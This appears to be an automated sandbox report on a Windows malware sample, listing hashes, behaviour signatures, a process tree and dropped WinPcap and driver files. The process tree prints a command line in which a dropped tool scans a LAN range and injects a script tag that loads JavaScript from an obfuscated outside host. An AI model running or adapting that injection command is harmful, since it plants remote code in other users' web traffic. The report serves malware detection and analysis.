Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/07/2024, 16:35

General

  • Target

    427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe

  • Size

    177KB

  • MD5

    427b1712db453f7ea97152ee068e056b

  • SHA1

    0938a1dc4e2a0a07d307fccc778878a1c5e4c0f6

  • SHA256

    6b846ed44f49df14967f7bbc746759b27eb2eb63ea1c9d6ad7f0cc3cc2d54d7e

  • SHA512

    2f3c0db42e9f6209afff053b2886db9348810d8efa89a2d277a489b765d3abe5c06b0f6c602c817ae15fc4260425af7491bef15e7cdbbcc388b94ee33aa9522a

  • SSDEEP

    3072:KdvRqti5Q1P5klXfzpkN4+Y9VtRVGw3lSiUtP0MwvtETkaLxpk+out:0vUtiK1uXfTt/X1SntP0Mwvt+Lxa+oS

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\SysWOW64\360ubak.exe
      -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%67b.P%61ss%69ngG%61s.n%65t/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:4996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 12.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4476
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        3⤵
        • Runs ping.exe
        PID:1664
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2016

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\12.bat

      Filesize

      2KB

      MD5

      7ff968a09adfe35719a287c16ae287c5

      SHA1

      5187079321bd50d6d6ce483e532f848af3944961

      SHA256

      c6db7656b32bea0548b9946f57242abe89d8c3bfb54f90cc21348717c185fb7c

      SHA512

      962d975694653d0be76c34026379c1f1168154f05401e650a5f4d66ff3c5b4f023d7d14e97e434c4b49eba9287cd95a16f551646c8ac949ce0b1d61f78f23d34

    • C:\Windows\SysWOW64\360ubak.exe

      Filesize

      8.0MB

      MD5

      ada78669e64513903ec644dce8d8a37f

      SHA1

      4f834b30e9e9d91fa20b7ac4d295ff218c340897

      SHA256

      88059adab948121734645918956bfe664e54a1106cf12682a050429f014ebb4c

      SHA512

      5780cb197d0961cbcd982e8a1552b6f5ccdb56f0819d36f3c9faf668f6cfb4a8406f5ecbb41113628e1001cad21bb1647de0c59908cc996a64c172106d656863

    • C:\Windows\SysWOW64\NPPTools.dll

      Filesize

      53KB

      MD5

      841007a04750a9acb56dd82095300d15

      SHA1

      58c1e338bc78a54795a844b559b614004e53d3cb

      SHA256

      a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578

      SHA512

      dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de

    • C:\Windows\SysWOW64\Packet.dll

      Filesize

      86KB

      MD5

      9062aeea8cbfc4f0780bbbefad7cebcb

      SHA1

      c4ad39ec51ad0e84fe58f62931d13cddfde3189e

      SHA256

      b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

      SHA512

      60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

    • C:\Windows\SysWOW64\WPCAP.DLL

      Filesize

      234KB

      MD5

      ce842d25e5b7e6ff21a86cad9195fbe8

      SHA1

      d762270be089a89266b012351b52c595e260b59b

      SHA256

      7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

      SHA512

      84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

    • C:\Windows\SysWOW64\WanPacket.dll

      Filesize

      66KB

      MD5

      fdd104a9fd3427a1df37041fa947a041

      SHA1

      cca1881a3c02033008f78cc39b712b637c7f3e13

      SHA256

      384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

      SHA512

      9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

    • C:\Windows\SysWOW64\drivers\NPF.sys

      Filesize

      41KB

      MD5

      b15e0180c43d8b5219196d76878cc2dd

      SHA1

      33e676b37a3380de32c10ba5bc9170997445d314

      SHA256

      a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

      SHA512

      47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

    • memory/4180-0-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

    • memory/4180-3-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

    • memory/4180-1-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

    • memory/4996-18-0x0000000000670000-0x0000000000685000-memory.dmp

      Filesize

      84KB

    • memory/4996-26-0x0000000000400000-0x000000000040F000-memory.dmp

      Filesize

      60KB

    • memory/4996-22-0x0000000000510000-0x0000000000520000-memory.dmp

      Filesize

      64KB

    • memory/4996-11-0x0000000000400000-0x000000000040F000-memory.dmp

      Filesize

      60KB